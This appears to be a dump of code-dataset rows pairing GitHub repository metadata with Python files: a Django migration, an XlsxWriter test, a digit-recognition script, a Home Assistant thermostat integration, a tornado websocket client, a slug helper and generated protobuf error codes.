# extra key press
extra_bool, fixed_word = extra.extra_key_press(word.word)
if extra_bool == True:
new = word.front + fixed_word + word.back
old = word.front + word.word + word.back
# 7. case is restored
if word.capital == True:
new = word.front + string_modify.upper_case(fixed_word) + word.back
old = word.front + string_modify.upper_case(word.word) + word.back
printed_words.append(new)
fixed_words[old] = new
return None
# could not be fixed
unknown_word = word.front + word.word + word.back
# 7. case is restored
if word.capital == True:
unknown_word = word.front + string_modify.upper_case(word.word) + word.back
printed_words.append(unknown_word)
unknown_words.append(unknown_word)
return None
| [
"gdk6217@rit.edu"
] | gdk6217@rit.edu |
73c9b5342eabcb3bb8276cb4376a74f14fefc0e8 | 57929d0fa09388a695b82dc1a7fa06c42eb162d5 | /core/migrations/0001_initial.py | c1803bdd5b889e7b9996542e6de574069f99c66c | [] | no_license | AlexPires1/pontos_turisticos | c4ddd703b3c952ca6e74f52bc3be1149250d966f | 078dc90529d9e0da7af44143acbce85df724e3ff | refs/heads/master | 2022-11-29T03:32:20.320167 | 2019-11-26T17:06:22 | 2019-11-26T17:06:22 | 220,482,293 | 0 | 0 | null | 2022-11-22T04:50:11 | 2019-11-08T14:22:58 | JavaScript | UTF-8 | Python | false | false | 611 | py | # Generated by Django 2.2.7 on 2019-11-08 14:41
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='PontoTuristico',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nome', models.CharField(max_length=150)),
('descricao', models.TextField()),
('aprovado', models.BooleanField(default=False)),
],
),
]
| [
"alexpirespereira747@gmail.com"
] | alexpirespereira747@gmail.com |
df22c26d03c9eb5404718fa0aee45e5b9bfd5116 | 9b422078f4ae22fe16610f2ebc54b8c7d905ccad | /xlsxwriter/test/comparison/test_image01.py | 81559d51c09a291a0dd6ef1c9b9f4f8d5f70ee88 | [
"BSD-2-Clause-Views"
] | permissive | projectsmahendra/XlsxWriter | 73d8c73ea648a911deea63cb46b9069fb4116b60 | 9b9d6fb283c89af8b6c89ad20f72b8208c2aeb45 | refs/heads/master | 2023-07-21T19:40:41.103336 | 2023-07-08T16:54:37 | 2023-07-08T16:54:37 | 353,636,960 | 0 | 0 | NOASSERTION | 2021-04-01T08:57:21 | 2021-04-01T08:57:20 | null | UTF-8 | Python | false | false | 1,149 | py | ###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2021, John McNamara, jmcnamara@cpan.org
#
from ..excel_comparison_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
"""
Test file created by XlsxWriter against a file created by Excel.
"""
def setUp(self):
self.set_filename('image01.xlsx')
def test_create_file(self):
"""Test the creation of a simple XlsxWriter file with image(s)."""
workbook = Workbook(self.got_filename)
worksheet = workbook.add_worksheet()
worksheet.insert_image('E9', self.image_dir + 'red.png')
workbook.close()
self.assertExcelEqual()
def test_create_file_in_memory(self):
"""Test the creation of a simple XlsxWriter file with image(s)."""
workbook = Workbook(self.got_filename, {'in_memory': True})
worksheet = workbook.add_worksheet()
worksheet.insert_image('E9', self.image_dir + 'red.png')
workbook.close()
self.assertExcelEqual()
| [
"jmcnamara@cpan.org"
] | jmcnamara@cpan.org |
3cbcab932761bab25e8cbb4b2de557be22d92ca2 | 282162df26e98a86e3fc33a861889a168be74fa2 | /Digit Recognition/digit.py | 2c05cad855d0ab45ddf31ce53536adf1ff9b7ac5 | [] | no_license | poojashri13/Analytics-Vidhya | 5cacde282c0aa83470b6425124c2f430ec72611a | 76210d4cf652499c90ff040b5835c5570bf0d15e | refs/heads/master | 2020-03-26T09:48:01.067539 | 2018-08-14T20:07:41 | 2018-08-14T20:07:41 | 144,765,577 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,566 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Sep 6 14:49:29 2017
@author: pshrivas
"""
import numpy as np
import pandas as pd
train_set = pd.read_csv("train.csv")
test_set = pd.read_csv("test.csv")
train_y = train_set.iloc[:,0].values
#Feature scaling
from sklearn.preprocessing import StandardScaler
sc_x = StandardScaler()
training_set = train_set.iloc[:,1:].values
x_train = sc_x.fit_transform(training_set)
x_test = sc_x.transform(test_set)
from sklearn.decomposition.pca import PCA
pca = PCA(n_components=15)
x_train = pca.fit_transform(x_train)
x_test = pca.transform(x_test)
explained_valriance = pca.explained_variance_ratio_
##Fitting Logistic regression to the training set
from sklearn.linear_model import LogisticRegression
classifier = LogisticRegression(random_state=0)
classifier.fit(x_train,train_y)
#
#y_pred = classifier.predict(x_test)
#digit = pd.DataFrame()
#digit["ImageId"]=range(1,len(test_set)+1)
#digit["Label"] = y_pred
#digit.to_csv("sub4.csv",index=False)
from sklearn.ensemble import RandomForestClassifier
classifier = RandomForestClassifier(n_estimators=10, criterion="entropy",random_state=0)
classifier.fit(x_train,train_y)
#Applying k-fold cross validation
from sklearn.model_selection import cross_val_score
accuracies = cross_val_score(estimator = classifier, X = x_train, y = train_y, cv = 10)
accuracies.mean()
accuracies.std()
#Fitting Random Forest
y_pred = classifier.predict(x_test)
digit = pd.DataFrame()
digit["ImageId"]=range(1,len(test_set)+1)
digit["Label"] = y_pred
digit.to_csv("subl280.csv",index=False) | [
"poojashrivastava51@gmail.com"
] | poojashrivastava51@gmail.com |
1d39f6538090cd646687b5aa96201d588b4bbdfe | 75959a00cd8e1d2b9ae92c4e4f00d7606e09ce29 | /climate.py | cd1d166ee127d3feec6d8c8c68d2101fdcfd48ad | [] | no_license | danielkucera/hass-cometblue | fce1d2a89ede5287cbdd22811aac5b8861d03d95 | 99364407662b59f37bb8ab9589ddfea93997c0b5 | refs/heads/master | 2020-04-27T17:42:57.358343 | 2019-03-08T12:27:09 | 2019-03-08T12:27:09 | 174,533,786 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,059 | py | """
Support for Eurotronic CometBlue thermostats.
They are identical to the Xavax Bluetooth thermostats and others, e.g. sold by discounters.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/climate.cometblue/
"""
import logging
from datetime import timedelta
from datetime import datetime
import threading
import voluptuous as vol
from sys import stderr
from homeassistant.components.climate import (
ClimateDevice,
PLATFORM_SCHEMA,
STATE_ON,
STATE_OFF,
SUPPORT_TARGET_TEMPERATURE_HIGH,
SUPPORT_TARGET_TEMPERATURE_LOW,
SUPPORT_OPERATION_MODE)
from homeassistant.const import (
CONF_NAME,
CONF_MAC,
CONF_PIN,
CONF_DEVICES,
TEMP_CELSIUS,
ATTR_TEMPERATURE,
PRECISION_HALVES)
import homeassistant.helpers.config_validation as cv
REQUIREMENTS = ['cometblue']
_LOGGER = logging.getLogger(__name__)
_LOGGER.setLevel(10)
MIN_TIME_BETWEEN_UPDATES = timedelta(seconds=300)
SCAN_INTERVAL = timedelta(seconds=300)
STATE_AUTO_LOCKED = "auto_locked"
STATE_AUTO = "auto"
STATE_MANUAL = "manual"
STATE_MANUAL_LOCKED = "manual_locked"
ATTR_STATE_WINDOW_OPEN = 'window_open'
ATTR_STATE_VALVE = 'valve'
ATTR_STATE_LOCKED = 'is_locked'
ATTR_STATE_LOW_BAT = 'low_battery'
ATTR_BATTERY = 'battery_level'
ATTR_TARGET = 'target_temp'
ATTR_VENDOR_NAME = 'vendor_name'
ATTR_MODEL = 'model'
ATTR_FIRMWARE = 'firmware'
ATTR_VERSION = 'version'
ATTR_WINDOW = 'window_open'
DEVICE_SCHEMA = vol.Schema({
vol.Required(CONF_MAC): cv.string,
vol.Optional(CONF_PIN, default=0): cv.positive_int,
})
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_DEVICES):
vol.Schema({cv.string: DEVICE_SCHEMA}),
})
SUPPORT_FLAGS = (SUPPORT_OPERATION_MODE)
from cometblue import device as cometblue_dev
gatt_mgr = None
def setup_platform(hass, config, add_devices, discovery_info=None):
global gatt_mgr
_LOGGER.debug("setup cometblue")
gatt_mgr = cometblue_dev.CometBlueManager('hci0')
class ManagerThread(threading.Thread):
def run(self):
gatt_mgr.run()
ManagerThread().start()
devices = []
for name, device_cfg in config[CONF_DEVICES].items():
_LOGGER.debug("adding device: {}".format(name))
dev = CometBlueThermostat(device_cfg[CONF_MAC], name, device_cfg[CONF_PIN])
devices.append(dev)
add_devices(devices)
class CometBlueStates():
BIT_MANUAL = 0x01
BIT_LOCKED = 0x80
BIT_WINDOW = 0x10
def __init__(self):
self._temperature = None
self.target_temp = None
self.manual = None
self.locked = None
self.window = None
self._battery_level = None
self.manufacturer = None
self.software_rev = None
self.firmware_rev = None
self.model_no = None
self.name = None
self.last_seen = None
self.last_talked = None
@property
def temperature_value(self):
val = {
'manual_temp': self.target_temp,
'current_temp': self.temperature,
'target_temp_l': 16,
'target_temp_h': 21,
'offset_temp': 0.0,
'window_open_detection': 12,
'window_open_minutes': 10
}
return val
@property
def mode_value(self):
val = {
'not_ready': None,
'childlock': self.locked,
'state_as_dword': None,
'manual_mode': self.manual,
'adapting': None,
'unused_bits': None,
'low_battery': None,
'antifrost_activated': None,
'motor_moving': None,
'installing': None,
'satisfied': None
}
return val
@mode_value.setter
def mode_value(self, value):
self.manual = value['manual_mode']
self.window = False
self.locked = value['childlock']
@property
def mode_code(self):
if self.manual is None or self.locked is None:
return None
if self.manual:
if self.locked:
return STATE_MANUAL_LOCKED
else:
return STATE_MANUAL
else:
if self.locked:
return STATE_AUTO_LOCKED
else:
return STATE_AUTO
@mode_code.setter
def mode_code(self, value):
if value == STATE_MANUAL:
self.manual = True
self.locked = False
elif value == STATE_MANUAL_LOCKED:
self.manual = True
self.locked = True
elif value == STATE_AUTO:
self.manual = False
self.locked = False
elif value == STATE_AUTO_LOCKED:
self.manual = False
self.locked = True
@property
def battery_level(self):
return self._battery_level
@battery_level.setter
def battery_level(self, value):
if value is not None and 0 <= value <= 100:
self._battery_level = value
@property
def temperature(self):
return self._temperature
@temperature.setter
def temperature(self, value):
if value is not None and 8 <= 28:
self._temperature = value
class CometBlueThermostat(ClimateDevice):
"""Representation of a CometBlue thermostat."""
def __init__(self, _mac, _name, _pin=None):
"""Initialize the thermostat."""
global gatt_mgr
self.modes = [STATE_AUTO, STATE_AUTO_LOCKED, STATE_MANUAL, STATE_MANUAL_LOCKED]
self._mac = _mac
self._name = _name
self._pin = _pin
self._thermostat = cometblue_dev.CometBlue(_mac, gatt_mgr, _pin)
self._target = CometBlueStates()
self._current = CometBlueStates()
self.update()
# def __del__(self):
# self._thermostat.disconnect()
@property
def supported_features(self):
"""Return the list of supported features."""
return SUPPORT_FLAGS
@property
def available(self) -> bool:
"""Return if thermostat is available."""
return True
@property
def name(self):
"""Return the name of the device."""
return self._name
@property
def temperature_unit(self):
"""Return the unit of measurement that is used."""
return TEMP_CELSIUS
@property
def precision(self):
"""Return cometblue's precision 0.5."""
return PRECISION_HALVES
@property
def current_temperature(self):
"""Return current temperature"""
return self._current.temperature
@property
def target_temperature(self):
"""Return the temperature we try to reach."""
return self._target.target_temp
def set_temperature(self, **kwargs):
"""Set new target temperature."""
temperature = kwargs.get(ATTR_TEMPERATURE)
if temperature is None:
return
if temperature < self.min_temp:
temperature = self.min_temp
if temperature > self.max_temp:
temperature = self.max_temp
self._target.target_temp = temperature
@property
def min_temp(self):
"""Return the minimum temperature."""
# return self._thermostat.min_temp
return 8.0
@property
def max_temp(self):
"""Return the maximum temperature."""
# return self._thermostat.max_temp
return 28.0
@property
def current_operation(self):
"""Current mode."""
return self._current.mode_code
@property
def operation_list(self):
"""List of available operation modes."""
return self.modes
def set_operation_mode(self, operation_mode):
"""Set operation mode."""
self._target.mode_code = operation_mode
def is_stale(self):
_LOGGER.info(
"{} last seen {} last talked {}".format(self._mac, self._current.last_seen, self._current.last_talked))
now = datetime.now()
if self._current.last_seen is not None and (now - self._current.last_seen).total_seconds() < 600:
return False
if self._current.last_talked is not None and (now - self._current.last_talked).total_seconds() < 600:
return False
return True
@property
def icon(self):
"""Return the icon to use in the frontend, if any."""
if self.is_stale():
return 'mdi:bluetooth-off'
if self._current.battery_level is None:
return 'mdi:bluetooth-off'
if self._current.battery_level == 100:
return 'mdi:battery'
if self._current.battery_level == 0:
return 'mdi:battery-alert'
if self._current.battery_level < 10:
return 'mdi:battery-outline'
if 10 <= self._current.battery_level <= 99:
return 'mdi:battery-{}0'.format(int(self._current.battery_level / 10))
return None
@property
def device_state_attributes(self):
"""Return the device specific state attributes."""
return {
ATTR_VENDOR_NAME: self._current.manufacturer,
ATTR_MODEL: self._current.model_no,
ATTR_FIRMWARE: self._current.firmware_rev,
ATTR_VERSION: self._current.software_rev,
ATTR_BATTERY: self._current.battery_level,
ATTR_TARGET: self._current.target_temp,
ATTR_WINDOW: self._current.window,
}
def update(self):
"""Update the data from the thermostat."""
get_temperatures = True
_LOGGER.info("Update called {}".format(self._mac))
self._thermostat.connect()
self._thermostat.attempt_to_get_ready()
with self._thermostat as device:
if self._current.mode_code != self._target.mode_code and self._target.manual is not None:
_LOGGER.debug("Setting mode to: {}".format(self._target.mode_value))
device.set_status(self._target.mode_value)
if self._current.target_temp != self._target.target_temp and self._target.target_temp is not None:
# TODO: Fix temperature settings. Currently not working.
_LOGGER.info("Values to set: {}".format(str(self._target.temperature_value)))
_LOGGER.debug("Setting temperature to: {}".format(self._target.target_temp))
device.set_temperatures(self._target.temperature_value)
get_temperatures = False
cur_batt = device.get_battery()
_LOGGER.debug("Current Battery Level: {}%".format(cur_batt))
cur_status = device.get_status()
cur_temps = device.get_temperatures()
if cur_temps['current_temp'] != -64.0:
self._current.temperature = cur_temps['current_temp']
self._current.target_temp = cur_temps['manual_temp']
_LOGGER.debug("Current Temperature: {}".format(cur_temps))
if self._current.model_no is None:
self._current.model_no = device.get_model_number()
self._current.firmware_rev = device.get_firmware_revision()
self._current.software_rev = device.get_software_revision()
self._current.manufacturer = device.get_manufacturer_name()
_LOGGER.debug("Current Mode: {}".format(cur_status))
_LOGGER.debug("Current Model Number: {}".format(self._current.model_no))
_LOGGER.debug("Current Firmware Revision: {}".format(self._current.firmware_rev))
_LOGGER.debug("Current Software Revision: {}".format(self._current.software_rev))
_LOGGER.debug("Current Manufacturer Name: {}".format(self._current.manufacturer))
self._thermostat.disconnect()
if self._current.target_temp is not None:
self._target.target_temp = self._current.target_temp
self._current.battery_level = cur_batt
self._current.mode_value = cur_status
self._current.last_seen = datetime.now()
self._current.last_talked = datetime.now()
| [
"github@danman.eu"
] | github@danman.eu |
d20fa8a5874b03d03598bf1c6b3baa5fe506c63c | 2515525acc90e7e59c31c7fd2215338698ad5def | /py35/try-ws-2.py | a617d5f70d6aad914454d078feb62e9e468fb433 | [] | no_license | jiagangzhang/myownsync | 3d07a90f94f233ea6efd44f04ad89037158cc535 | 09f8529952f6cfe65e6eddb3df4bb948a79cb0e8 | refs/heads/master | 2021-01-24T00:03:30.355743 | 2017-08-21T06:51:14 | 2017-08-21T06:51:14 | 68,782,531 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,926 | py | from tornado.websocket import websocket_connect
from tornado.ioloop import IOLoop, PeriodicCallback
from tornado import gen
import time
# def connectWS():
# print ('start')
# ws = websocket_connect('ws://echo.websocket.org/?encoding=text')
# # print (ws.result())
# while ws.running():
# time.sleep(1)
# print('waiting')
# print (ws.done())
# if ws.done():
# ws.write_message('hello')
# print ('sent')
# response = ws.read_message()
# print (type(response))
#
# for i in range(1):
# print ('woala')
# connectWS()
class Client(object):
def __init__(self, url, timeout):
self.url = url
self.timeout = timeout
self.ioloop = IOLoop.instance()
self.ws = None
self.connect()
# PeriodicCallback(self.keep_alive, 20000, io_loop=self.ioloop).start()
self.ioloop.start()
@gen.coroutine
def connect(self):
print ("trying to connect")
try:
self.ws = yield websocket_connect(self.url)
except Exception:
print ("connection error")
else:
print ("connected")
# self.run()
# for i in range(1):
self.sendMessage()
# print ('trying to send')
# self.ws.write_message('hello')
# print ('sent hello')
# response=yield self.ws.read_message()
# print (response)
# time.sleep(5)
# self.closeconn()
@gen.coroutine
def sendMessage(self):
try:
print ('trying to send')
self.ws.write_message('hello')
# print (self.ws)
print ('sent hello')
response=yield self.ws.read_message()
# time.sleep(1)
print (response)
except Exception:
print ('sent error')
else:
self.closeconn()
# print ('trying to send')
# self.ws.write_message('hello')
# # print (self.ws)
# print ('sent hello')
# # time.sleep(1)
# # response=yield self.ws.read_message()
# # # time.sleep(1)
# # print (response)
# while True:
# print (1)
# response = yield self.ws.read_message()
# if response is None:
# print ('none')
# break
# print (response)
@gen.coroutine
def checkResult(self,result):
pass
@gen.coroutine
def closeconn(self):
print ('closing')
self.ws.close()
print ('closed')
self.ioloop.stop()
@gen.coroutine
def run(self):
while True:
msg = yield self.ws.read_message()
if msg is None:
print ("connection closed")
self.ws = None
break
if __name__ == "__main__":
client = Client("wss://uat-lc.mymm.com:7600", 5)
| [
"jiagangzhang@mymm.com"
] | jiagangzhang@mymm.com |
e2697a7687d622b65ed30fd71240500da699214f | c79165e2600759a5266adbc6620884c8696e8dc3 | /books/utils.py | a82b038902380ce2a1b432c0d25b7f8a76bf1ac2 | [] | no_license | Elchinas25/nuggets | 12e60ec43a635cbff558363454828e2b1aa5d12c | 1e2d027a41e8df5b378067f85f244d4a8dfa222c | refs/heads/master | 2021-09-08T15:21:13.589987 | 2018-03-10T15:56:21 | 2018-03-10T15:56:21 | 124,670,366 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,125 | py | from django.utils.text import slugify
'''
random_string_generator is located here:
http://joincfe.com/blog/random-string-generator-in-python/
'''
import random
import string
DONT_USE = []
def unique_slug_generator(instance, new_slug=None):
"""
This is for a Django project and it assumes your instance
has a model with a slug field and a title character (char) field.
"""
if new_slug is not None:
slug = new_slug
else:
slug = slugify(instance.title)
if slug in DONT_USE:
new_slug = "{slug}-{randstr}".format(
slug=slug,
randstr=random_string_generator(size=4)
)
return unique_slug_generator(instance, new_slug=new_slug)
return slug
Klass = instance.__class__
qs_exists = Klass.objects.filter(slug=slug).exists()
if qs_exists:
new_slug = "{slug}-{randstr}".format(
slug=slug,
randstr=random_string_generator(size=4)
)
return unique_slug_generator(instance, new_slug=new_slug)
return slug | [
"noreply@github.com"
] | Elchinas25.noreply@github.com |
d3553bdebfba88789aa4678fd67bb97396e9767d | 79fa6f3a9c0c07b2768b5c67d48cd2d3ada921c7 | /kikimr/public/api/protos/draft/persqueue_error_codes_pb2.py | 97b818110b3a6a275934558ce54cac8287566409 | [
"Apache-2.0"
] | permissive | clumpytuna/ydb-python-sdk | 8dd951a532045587fcba1d541b3fb8798c358318 | f09d8db19f62032738ed77dabb3672c3e0f86cc3 | refs/heads/master | 2023-06-09T22:38:29.747969 | 2021-06-30T08:09:14 | 2021-06-30T08:09:14 | 319,103,389 | 0 | 0 | NOASSERTION | 2020-12-06T18:32:35 | 2020-12-06T18:32:34 | null | UTF-8 | Python | false | true | 6,378 | py | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: kikimr/public/api/protos/draft/persqueue_error_codes.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf.internal import enum_type_wrapper
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='kikimr/public/api/protos/draft/persqueue_error_codes.proto',
package='NPersQueue.NErrorCode',
syntax='proto3',
serialized_pb=_b('\n:kikimr/public/api/protos/draft/persqueue_error_codes.proto\x12\x15NPersQueue.NErrorCode*\xd9\x04\n\nEErrorCode\x12\x06\n\x02OK\x10\x00\x12\x10\n\x0cINITIALIZING\x10\x01\x12\x0c\n\x08OVERLOAD\x10\x02\x12\x0f\n\x0b\x42\x41\x44_REQUEST\x10\x03\x12\x10\n\x0cWRONG_COOKIE\x10\x04\x12!\n\x1dWRITE_ERROR_PARTITION_IS_FULL\x10\x05\x12\x1c\n\x18WRITE_ERROR_DISK_IS_FULL\x10\x0f\x12\x1a\n\x16WRITE_ERROR_BAD_OFFSET\x10\x13\x12!\n\x1d\x43REATE_SESSION_ALREADY_LOCKED\x10\x06\x12\x1d\n\x19\x44\x45LETE_SESSION_NO_SESSION\x10\x07\x12\x1a\n\x16READ_ERROR_IN_PROGRESS\x10\x08\x12\x19\n\x15READ_ERROR_NO_SESSION\x10\t\x12\x10\n\x0cREAD_TIMEOUT\x10\n\x12\x1f\n\x1bREAD_ERROR_TOO_SMALL_OFFSET\x10\x0b\x12\x1d\n\x19READ_ERROR_TOO_BIG_OFFSET\x10\x0c\x12%\n!SET_OFFSET_ERROR_COMMIT_TO_FUTURE\x10\r\x12\x15\n\x11TABLET_IS_DROPPED\x10\x0e\x12\x11\n\rREAD_NOT_DONE\x10\x10\x12\x11\n\rUNKNOWN_TOPIC\x10\x11\x12\x11\n\rACCESS_DENIED\x10\x12\x12\x14\n\x10\x43LUSTER_DISABLED\x10\x14\x12\x1a\n\x16WRONG_PARTITION_NUMBER\x10\x15\x12\x12\n\x0e\x43REATE_TIMEOUT\x10\x16\x12\x10\n\x0cIDLE_TIMEOUT\x10\x17\x12\t\n\x05\x45RROR\x10\x64\x42\x1a\n\x18\x63om.yandex.ydb.persqueueb\x06proto3')
)
_EERRORCODE = _descriptor.EnumDescriptor(
name='EErrorCode',
full_name='NPersQueue.NErrorCode.EErrorCode',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='OK', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='INITIALIZING', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='OVERLOAD', index=2, number=2,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BAD_REQUEST', index=3, number=3,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='WRONG_COOKIE', index=4, number=4,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='WRITE_ERROR_PARTITION_IS_FULL', index=5, number=5,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='WRITE_ERROR_DISK_IS_FULL', index=6, number=15,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='WRITE_ERROR_BAD_OFFSET', index=7, number=19,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CREATE_SESSION_ALREADY_LOCKED', index=8, number=6,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DELETE_SESSION_NO_SESSION', index=9, number=7,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='READ_ERROR_IN_PROGRESS', index=10, number=8,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='READ_ERROR_NO_SESSION', index=11, number=9,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='READ_TIMEOUT', index=12, number=10,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='READ_ERROR_TOO_SMALL_OFFSET', index=13, number=11,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='READ_ERROR_TOO_BIG_OFFSET', index=14, number=12,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SET_OFFSET_ERROR_COMMIT_TO_FUTURE', index=15, number=13,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='TABLET_IS_DROPPED', index=16, number=14,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='READ_NOT_DONE', index=17, number=16,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='UNKNOWN_TOPIC', index=18, number=17,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ACCESS_DENIED', index=19, number=18,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CLUSTER_DISABLED', index=20, number=20,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='WRONG_PARTITION_NUMBER', index=21, number=21,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CREATE_TIMEOUT', index=22, number=22,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='IDLE_TIMEOUT', index=23, number=23,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ERROR', index=24, number=100,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=86,
serialized_end=687,
)
_sym_db.RegisterEnumDescriptor(_EERRORCODE)
EErrorCode = enum_type_wrapper.EnumTypeWrapper(_EERRORCODE)
OK = 0
INITIALIZING = 1
OVERLOAD = 2
BAD_REQUEST = 3
WRONG_COOKIE = 4
WRITE_ERROR_PARTITION_IS_FULL = 5
WRITE_ERROR_DISK_IS_FULL = 15
WRITE_ERROR_BAD_OFFSET = 19
CREATE_SESSION_ALREADY_LOCKED = 6
DELETE_SESSION_NO_SESSION = 7
READ_ERROR_IN_PROGRESS = 8
READ_ERROR_NO_SESSION = 9
READ_TIMEOUT = 10
READ_ERROR_TOO_SMALL_OFFSET = 11
READ_ERROR_TOO_BIG_OFFSET = 12
SET_OFFSET_ERROR_COMMIT_TO_FUTURE = 13
TABLET_IS_DROPPED = 14
READ_NOT_DONE = 16
UNKNOWN_TOPIC = 17
ACCESS_DENIED = 18
CLUSTER_DISABLED = 20
WRONG_PARTITION_NUMBER = 21
CREATE_TIMEOUT = 22
IDLE_TIMEOUT = 23
ERROR = 100
DESCRIPTOR.enum_types_by_name['EErrorCode'] = _EERRORCODE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
DESCRIPTOR.has_options = True
DESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), _b('\n\030com.yandex.ydb.persqueue'))
# @@protoc_insertion_point(module_scope)
| [
"arcadia-devtools@yandex-team.ru"
] | arcadia-devtools@yandex-team.ru |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.